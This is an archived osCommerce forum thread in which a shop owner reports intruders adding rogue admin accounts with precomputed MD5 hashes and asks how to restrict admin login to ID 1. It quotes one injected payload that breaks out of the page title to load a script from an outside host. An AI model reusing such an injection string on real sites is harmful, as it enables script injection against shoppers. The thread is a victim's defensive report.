Medworks Posted August 12, 2011 Posted August 12, 2011 Those damn hackers! Day after day after day after day it's the same thing. My administrator counter is a 3 digit number now. What they do is they insert a new administrator with a password of their choice into the admin table, which they have precalculated the md5 code for having a password of their choice, since it is easy to go from the password to the md5 goobledygook, and then they sign in with that and they are free to wreak any havoc they want. Another thing they do, by the way, is change my store name in configuration from "Medworks" to something like "Medworks</title><script src=http://blahblahblahblah.com/jquery/></script><title>" so that it loads some horrible thing whenever someone goes to the shopping cart section, or even if it doesn't, just so it tells them the name of the business is Medworks</title><script src=http://blahblahblahblah.com/jquery/></script><title> instead of Medworks. My webhost REFUSES to let me make the administrator and configuration sections of the SQL read only because they say it would be too much trouble for them, or to grant me the access I would need to do it myself because it is a shared server and that would give me access to meddle with other peoples' accounts as if I was a parasite who was interested in doing that. But then I got an idea. The admin ID. MY admin ID is 1. Every time someone generates a new fake admin account, it is assigned 1 higher than the last, unless I set the counter back down. There MUST be some code I can modify within oscommerce that makes it so ONLY an admin with an ID value equal to 1 can get in! In other words, the way it is now, to sign in as an administrator, one must enter a username which exists in the administrator table, and a password which when fed through the md5 one way function should equal the stored value of password for that administrator, but I want to change it so that one must enter a username which exists in the administrator table, and a password which when fed through the md5 one way function should equal the stored value of password for that administrator, AND the ID number of that administrator is equal to 1! In other words, they can generate fake admins with their passwords until the cows come home, but they're totally useless, they can't use a one of them, since none of them will have an administrator ID of 1 because that will already have been taken by me and my real account! Of course, if they have a way to modify the original administrator ID (and they do, but not necessarily a way to change it to what they want it to be), it wouldn't help them. But if you pointed me to this code, I could perhaps come up with a more clever way to handle this possibility as well. The other possibility is getting it to scramble the password in a different way than it does now, and a method that is not visible to the public, so that their precomputed passwords will not work. They must know how osCommerce computes the md5 scramble because it must be standard, so that they know what to insert. I don't like this idea as much. Does anyone know what code I need to modify so that osCommerce does that?
Guest Posted August 12, 2011 Posted August 12, 2011 Sandor, Your problem isn't the hackers.....it's YOU ! CLEAN and SECURE your website and the hackers can't get in to create new accounts and corrupt your code. Read and apply the security changes in these two threads: Admin Security and Website Security Chris
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.